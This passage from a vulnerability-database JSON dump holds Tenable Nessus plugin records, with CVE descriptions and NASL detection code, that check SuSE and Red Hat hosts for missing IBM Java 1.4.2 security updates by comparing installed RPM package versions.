to read and write local files, or run local\napplications that are accessible to the user running the untrusted\napplet.\n\n - A security vulnerability in the Java Runtime Environment\n with verifying HMAC digests might allow authentication\n to be bypassed. This action can allow a user to forge a\n digital signature that would be accepted as valid.\n Applications that validate HMAC-based digital signatures\n might be vulnerable to this type of attack.\n (CVE-2009-3875)\n\n - A buffer overflow vulnerability in the Java Runtime\n Environment with processing image files might allow an\n untrusted applet or Java Web Start application to\n escalate privileges. For example, an untrusted applet\n might grant itself permissions to read and write local\n files or run local applications that are accessible to\n the user running the untrusted applet. (CVE-2009-3869)\n\n - A buffer overflow vulnerability in the Java Runtime\n Environment with processing image files might allow an\n untrusted applet or Java Web Start application to\n escalate privileges. For example, an untrusted applet\n might grant itself permissions to read and write local\n files or run local applications that are accessible to\n the user running the untrusted applet. (CVE-2009-3871)\n\n - An integer overflow vulnerability in the Java Runtime\n Environment with processing JPEG images might allow an\n untrusted applet or Java Web Start application to\n escalate privileges. For example, an untrusted applet\n might grant itself permissions to read and write local\n files or run local applications that are accessible to\n the user running the untrusted applet. (CVE-2009-3874)", "edition": 24, "published": "2010-01-12T00:00:00", "title": "SuSE 10 Security Update : IBM Java 1.4.2 (ZYPP Patch Number 6757)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3867", "CVE-2009-3875", "CVE-2009-3869", "CVE-2009-3874", "CVE-2009-3871"], "modified": "2010-01-12T00:00:00", "cpe": ["cpe:/o:suse:suse_linux"], "id": "SUSE_JAVA-1_4_2-IBM-6757.NASL", "href": "https://www.tenable.com/plugins/nessus/43859", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The text description of this plugin is (C) Novell, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(43859);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2009-3867\", \"CVE-2009-3869\", \"CVE-2009-3871\", \"CVE-2009-3874\", \"CVE-2009-3875\");\n\n script_name(english:\"SuSE 10 Security Update : IBM Java 1.4.2 (ZYPP Patch Number 6757)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 10 host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"IBM Java 1.4.2 was updated to 13 fp3.\n\nThe following security issues were fixed: CVE-2009-3867: A buffer\noverflow vulnerability in the Java Runtime Environment audio system\nmight allow an untrusted applet or Java Web Start application to\nescalate privileges. For example, an untrusted applet might grant\nitself permissions to read and write local files, or run local\napplications that are accessible to the user running the untrusted\napplet.\n\n - A security vulnerability in the Java Runtime Environment\n with verifying HMAC digests might allow authentication\n to be bypassed. This action can allow a user to forge a\n digital signature that would be accepted as valid.\n Applications that validate HMAC-based digital signatures\n might be vulnerable to this type of attack.\n (CVE-2009-3875)\n\n - A buffer overflow vulnerability in the Java Runtime\n Environment with processing image files might allow an\n untrusted applet or Java Web Start application to\n escalate privileges. For example, an untrusted applet\n might grant itself permissions to read and write local\n files or run local applications that are accessible to\n the user running the untrusted applet. (CVE-2009-3869)\n\n - A buffer overflow vulnerability in the Java Runtime\n Environment with processing image files might allow an\n untrusted applet or Java Web Start application to\n escalate privileges. For example, an untrusted applet\n might grant itself permissions to read and write local\n files or run local applications that are accessible to\n the user running the untrusted applet. (CVE-2009-3871)\n\n - An integer overflow vulnerability in the Java Runtime\n Environment with processing JPEG images might allow an\n untrusted applet or Java Web Start application to\n escalate privileges. For example, an untrusted applet\n might grant itself permissions to read and write local\n files or run local applications that are accessible to\n the user running the untrusted applet. (CVE-2009-3874)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3867.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3869.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3871.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3874.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3875.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply ZYPP patch number 6757.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Sun Java JRE AWT setDiffICM Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(119, 189, 310);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:suse:suse_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/01/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/01/12\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) exit(0, \"Local checks are not enabled.\");\nif (!get_kb_item(\"Host/SuSE/release\")) exit(0, \"The host is not running SuSE.\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) exit(1, \"Could not obtain the list of installed packages.\");\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) exit(1, \"Failed to determine the architecture type.\");\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") exit(1, \"Local checks for SuSE 10 on the '\"+cpu+\"' architecture have not been implemented.\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"java-1_4_2-ibm-1.4.2_sr13.3-1.4.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"java-1_4_2-ibm-devel-1.4.2_sr13.3-1.4.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, cpu:\"i586\", reference:\"java-1_4_2-ibm-jdbc-1.4.2_sr13.3-1.4.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, cpu:\"i586\", reference:\"java-1_4_2-ibm-plugin-1.4.2_sr13.3-1.4.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse exit(0, \"The host is not affected.\");\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T14:02:26", "description": "IBM Java 1.4.2 was updated to 13 fp3.\n\nThe following security issues were fixed :\n\n - A buffer overflow vulnerability in the Java Runtime\n Environment audio system might allow an untrusted applet\n or Java Web Start application to escalate privileges.\n For example, an untrusted applet might grant itself\n permissions to read and write local files, or run local\n applications that are accessible to the user running the\n untrusted applet. (CVE-2009-3867)\n\n - A security vulnerability in the Java Runtime Environment\n with verifying HMAC digests might allow authentication\n to be bypassed. This action can allow a user to forge a\n digital signature that would be accepted as valid.\n Applications that validate HMAC-based digital signatures\n might be vulnerable to this type of attack.\n (CVE-2009-3875)\n\n - A buffer overflow vulnerability in the Java Runtime\n Environment with processing image files might allow an\n untrusted applet or Java Web Start application to\n escalate privileges. For example, an untrusted applet\n might grant itself permissions to read and write local\n files or run local applications that are accessible to\n the user running the untrusted applet. (CVE-2009-3869)\n\n - A buffer overflow vulnerability in the Java Runtime\n Environment with processing image files might allow an\n untrusted applet or Java Web Start application to\n escalate privileges. For example, an untrusted applet\n might grant itself permissions to read and write local\n files or run local applications that are accessible to\n the user running the untrusted applet. (CVE-2009-3871)\n\n - An integer overflow vulnerability in the Java Runtime\n Environment with processing JPEG images might allow an\n untrusted applet or Java Web Start application to\n escalate privileges. For example, an untrusted applet\n might grant itself permissions to read and write local\n files or run local applications that are accessible to\n the user running the untrusted applet. (CVE-2009-3874)", "edition": 24, "published": "2010-01-12T00:00:00", "title": "SuSE9 Security Update : IBM Java2 JRE and SDK (YOU Patch Number 12565)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3867", "CVE-2009-3875", "CVE-2009-3869", "CVE-2009-3874", "CVE-2009-3871"], "modified": "2010-01-12T00:00:00", "cpe": ["cpe:/o:suse:suse_linux"], "id": "SUSE9_12565.NASL", "href": "https://www.tenable.com/plugins/nessus/43854", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The text description of this plugin is (C) Novell, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(43854);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2009-3867\", \"CVE-2009-3869\", \"CVE-2009-3871\", \"CVE-2009-3874\", \"CVE-2009-3875\");\n\n script_name(english:\"SuSE9 Security Update : IBM Java2 JRE and SDK (YOU Patch Number 12565)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 9 host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"IBM Java 1.4.2 was updated to 13 fp3.\n\nThe following security issues were fixed :\n\n - A buffer overflow vulnerability in the Java Runtime\n Environment audio system might allow an untrusted applet\n or Java Web Start application to escalate privileges.\n For example, an untrusted applet might grant itself\n permissions to read and write local files, or run local\n applications that are accessible to the user running the\n untrusted applet. (CVE-2009-3867)\n\n - A security vulnerability in the Java Runtime Environment\n with verifying HMAC digests might allow authentication\n to be bypassed. This action can allow a user to forge a\n digital signature that would be accepted as valid.\n Applications that validate HMAC-based digital signatures\n might be vulnerable to this type of attack.\n (CVE-2009-3875)\n\n - A buffer overflow vulnerability in the Java Runtime\n Environment with processing image files might allow an\n untrusted applet or Java Web Start application to\n escalate privileges. For example, an untrusted applet\n might grant itself permissions to read and write local\n files or run local applications that are accessible to\n the user running the untrusted applet. (CVE-2009-3869)\n\n - A buffer overflow vulnerability in the Java Runtime\n Environment with processing image files might allow an\n untrusted applet or Java Web Start application to\n escalate privileges. For example, an untrusted applet\n might grant itself permissions to read and write local\n files or run local applications that are accessible to\n the user running the untrusted applet. (CVE-2009-3871)\n\n - An integer overflow vulnerability in the Java Runtime\n Environment with processing JPEG images might allow an\n untrusted applet or Java Web Start application to\n escalate privileges. For example, an untrusted applet\n might grant itself permissions to read and write local\n files or run local applications that are accessible to\n the user running the untrusted applet. (CVE-2009-3874)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3867.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3869.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3871.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3874.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3875.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply YOU patch number 12565.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Sun Java JRE AWT setDiffICM Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(119, 189, 310);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:suse:suse_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/01/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/01/12\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) exit(0, \"Local checks are not enabled.\");\nif (!get_kb_item(\"Host/SuSE/release\")) exit(0, \"The host is not running SuSE.\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) exit(1, \"Could not obtain the list of installed packages.\");\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) exit(1, \"Failed to determine the architecture type.\");\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") exit(1, \"Local checks for SuSE 9 on the '\"+cpu+\"' architecture have not been implemented.\");\n\n\nflag = 0;\nif (rpm_check(release:\"SUSE9\", reference:\"IBMJava2-JRE-1.4.2_sr13.3-0.7\")) flag++;\nif (rpm_check(release:\"SUSE9\", reference:\"IBMJava2-SDK-1.4.2_sr13.3-0.7\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse exit(0, \"The host is not affected.\");\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T14:44:20", "description": "IBM Java 1.4.2 was updated to 13 fp3.\n\nThe following security issues were fixed: CVE-2009-3867: A buffer\noverflow vulnerability in the Java Runtime Environment audio system\nmight allow an untrusted applet or Java Web Start application to\nescalate privileges. For example, an untrusted applet might grant\nitself permissions to read and write local files, or run local\napplications that are accessible to the user running the untrusted\napplet.\n\n - A security vulnerability in the Java Runtime Environment\n with verifying HMAC digests might allow authentication\n to be bypassed. This action can allow a user to forge a\n digital signature that would be accepted as valid.\n Applications that validate HMAC-based digital signatures\n might be vulnerable to this type of attack.\n (CVE-2009-3875)\n\n - A buffer overflow vulnerability in the Java Runtime\n Environment with processing image files might allow an\n untrusted applet or Java Web Start application to\n escalate privileges. For example, an untrusted applet\n might grant itself permissions to read and write local\n files or run local applications that are accessible to\n the user running the untrusted applet. (CVE-2009-3869)\n\n - A buffer overflow vulnerability in the Java Runtime\n Environment with processing image files might allow an\n untrusted applet or Java Web Start application to\n escalate privileges. For example, an untrusted applet\n might grant itself permissions to read and write local\n files or run local applications that are accessible to\n the user running the untrusted applet. (CVE-2009-3871)\n\n - An integer overflow vulnerability in the Java Runtime\n Environment with processing JPEG images might allow an\n untrusted applet or Java Web Start application to\n escalate privileges. For example, an untrusted applet\n might grant itself permissions to read and write local\n files or run local applications that are accessible to\n the user running the untrusted applet. (CVE-2009-3874)", "edition": 24, "published": "2010-10-11T00:00:00", "title": "SuSE 10 Security Update : IBM Java 1.4.2 (ZYPP Patch Number 6755)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3867", "CVE-2009-3875", "CVE-2009-3869", "CVE-2009-3874", "CVE-2009-3871"], "modified": "2010-10-11T00:00:00", "cpe": ["cpe:/o:suse:suse_linux"], "id": "SUSE_JAVA-1_4_2-IBM-6755.NASL", "href": "https://www.tenable.com/plugins/nessus/49861", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The text description of this plugin is (C) Novell, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(49861);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2009-3867\", \"CVE-2009-3869\", \"CVE-2009-3871\", \"CVE-2009-3874\", \"CVE-2009-3875\");\n\n script_name(english:\"SuSE 10 Security Update : IBM Java 1.4.2 (ZYPP Patch Number 6755)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 10 host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"IBM Java 1.4.2 was updated to 13 fp3.\n\nThe following security issues were fixed: CVE-2009-3867: A buffer\noverflow vulnerability in the Java Runtime Environment audio system\nmight allow an untrusted applet or Java Web Start application to\nescalate privileges. For example, an untrusted applet might grant\nitself permissions to read and write local files, or run local\napplications that are accessible to the user running the untrusted\napplet.\n\n - A security vulnerability in the Java Runtime Environment\n with verifying HMAC digests might allow authentication\n to be bypassed. This action can allow a user to forge a\n digital signature that would be accepted as valid.\n Applications that validate HMAC-based digital signatures\n might be vulnerable to this type of attack.\n (CVE-2009-3875)\n\n - A buffer overflow vulnerability in the Java Runtime\n Environment with processing image files might allow an\n untrusted applet or Java Web Start application to\n escalate privileges. For example, an untrusted applet\n might grant itself permissions to read and write local\n files or run local applications that are accessible to\n the user running the untrusted applet. (CVE-2009-3869)\n\n - A buffer overflow vulnerability in the Java Runtime\n Environment with processing image files might allow an\n untrusted applet or Java Web Start application to\n escalate privileges. For example, an untrusted applet\n might grant itself permissions to read and write local\n files or run local applications that are accessible to\n the user running the untrusted applet. (CVE-2009-3871)\n\n - An integer overflow vulnerability in the Java Runtime\n Environment with processing JPEG images might allow an\n untrusted applet or Java Web Start application to\n escalate privileges. For example, an untrusted applet\n might grant itself permissions to read and write local\n files or run local applications that are accessible to\n the user running the untrusted applet. (CVE-2009-3874)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3867.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3869.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3871.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3874.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3875.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply ZYPP patch number 6755.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Sun Java JRE AWT setDiffICM Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(119, 189, 310);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:suse:suse_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/01/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/10/11\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) exit(0, \"Local checks are not enabled.\");\nif (!get_kb_item(\"Host/SuSE/release\")) exit(0, \"The host is not running SuSE.\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) exit(1, \"Could not obtain the list of installed packages.\");\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) exit(1, \"Failed to determine the architecture type.\");\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") exit(1, \"Local checks for SuSE 10 on the '\"+cpu+\"' architecture have not been implemented.\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLES10\", sp:3, reference:\"java-1_4_2-ibm-1.4.2_sr13.3-1.4.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:3, reference:\"java-1_4_2-ibm-devel-1.4.2_sr13.3-1.4.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:3, cpu:\"i586\", reference:\"java-1_4_2-ibm-jdbc-1.4.2_sr13.3-1.4.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse exit(0, \"The host is not affected.\");\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T13:07:16", "description": "Updated java-1.4.2-ibm packages that fix several security issues are\nnow available for Red Hat Enterprise Linux 3 Extras, Red Hat\nEnterprise Linux 4 Extras, and Red Hat Enterprise Linux 5\nSupplementary.\n\nThis update has been rated as having critical security impact by the\nRed Hat Security Response Team.\n\nThe IBM 1.4.2 SR13-FP3 Java release includes the IBM Java 2 Runtime\nEnvironment and the IBM Java 2 Software Development Kit.\n\nThis update fixes several vulnerabilities in the IBM Java 2 Runtime\nEnvironment and the IBM Java 2 Software Development Kit. These\nvulnerabilities are summarized on the IBM 'Security alerts' page\nlisted in the References section. (CVE-2009-3867, CVE-2009-3868,\nCVE-2009-3869, CVE-2009-3871, CVE-2009-3872, CVE-2009-3873,\nCVE-2009-3874, CVE-2009-3875, CVE-2009-3876, CVE-2009-3877)\n\nAll users of java-1.4.2-ibm are advised to upgrade to these updated\npackages, which contain the IBM 1.4.2 SR13-FP3 Java release. All\nrunning instances of IBM Java must be restarted for this update to\ntake effect.", "edition": 29, "published": "2009-12-08T00:00:00", "title": "RHEL 3 / 4 / 5 : java-1.4.2-ibm (RHSA-2009:1643)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3876", "CVE-2010-0079", "CVE-2009-3873", "CVE-2009-3872", "CVE-2009-3867", "CVE-2009-3875", "CVE-2009-3869", "CVE-2009-3874", "CVE-2009-3871", "CVE-2009-3877", "CVE-2009-3868"], "modified": "2009-12-08T00:00:00", "cpe": ["cpe:/o:redhat:enterprise_linux:3", "cpe:/o:redhat:enterprise_linux:4", "p-cpe:/a:redhat:enterprise_linux:java-1.4.2-ibm-plugin", "cpe:/o:redhat:enterprise_linux:5", "p-cpe:/a:redhat:enterprise_linux:java-1.4.2-ibm", "p-cpe:/a:redhat:enterprise_linux:java-1.4.2-ibm-devel", "cpe:/o:redhat:enterprise_linux:4.8", "p-cpe:/a:redhat:enterprise_linux:java-1.4.2-ibm-jdbc", "p-cpe:/a:redhat:enterprise_linux:java-1.4.2-ibm-javacomm", "p-cpe:/a:redhat:enterprise_linux:java-1.4.2-ibm-src", "cpe:/o:redhat:enterprise_linux:5.4", "p-cpe:/a:redhat:enterprise_linux:java-1.4.2-ibm-demo"], "id": "REDHAT-RHSA-2009-1643.NASL", "href": "https://www.tenable.com/plugins/nessus/43048", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2009:1643. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(43048);\n script_version(\"1.35\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2009-3867\", \"CVE-2009-3868\", \"CVE-2009-3869\", \"CVE-2009-3871\", \"CVE-2009-3872\", \"CVE-2009-3873\", \"CVE-2009-3874\", \"CVE-2009-3875\", \"CVE-2009-3876\", \"CVE-2009-3877\", \"CVE-2010-0079\");\n script_bugtraq_id(36881);\n script_xref(name:\"RHSA\", value:\"2009:1643\");\n\n script_name(english:\"RHEL 3 / 4 / 5 : java-1.4.2-ibm (RHSA-2009:1643)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated java-1.4.2-ibm packages that fix several security issues are\nnow available for Red Hat Enterprise Linux 3 Extras, Red Hat\nEnterprise Linux 4 Extras, and Red Hat Enterprise Linux 5\nSupplementary.\n\nThis update has been rated as having critical security impact by the\nRed Hat Security Response Team.\n\nThe IBM 1.4.2 SR13-FP3 Java release includes the IBM Java 2 Runtime\nEnvironment and the IBM Java 2 Software Development Kit.\n\nThis update fixes several vulnerabilities in the IBM Java 2 Runtime\nEnvironment and the IBM Java 2 Software Development Kit. These\nvulnerabilities are summarized on the IBM 'Security alerts' page\nlisted in the References section. (CVE-2009-3867, CVE-2009-3868,\nCVE-2009-3869, CVE-2009-3871, CVE-2009-3872, CVE-2009-3873,\nCVE-2009-3874, CVE-2009-3875, CVE-2009-3876, CVE-2009-3877)\n\nAll users of java-1.4.2-ibm are advised to upgrade to these updated\npackages, which contain the IBM 1.4.2 SR13-FP3 Java release. All\nrunning instances of IBM Java must be restarted for this update to\ntake effect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2009-3867\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2009-3868\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2009-3869\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2009-3871\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2009-3872\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2009-3873\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2009-3874\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2009-3875\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2009-3876\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2009-3877\"\n );\n # http://www.ibm.com/developerworks/java/jdk/alerts/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://developer.ibm.com/javasdk/support/security-vulnerabilities/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2009:1643\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Sun Java JRE AWT setDiffICM Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(119, 189, 310, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.4.2-ibm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.4.2-ibm-demo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.4.2-ibm-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.4.2-ibm-javacomm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.4.2-ibm-jdbc\");\n script_set_attribute(attribute:\"cpe\", 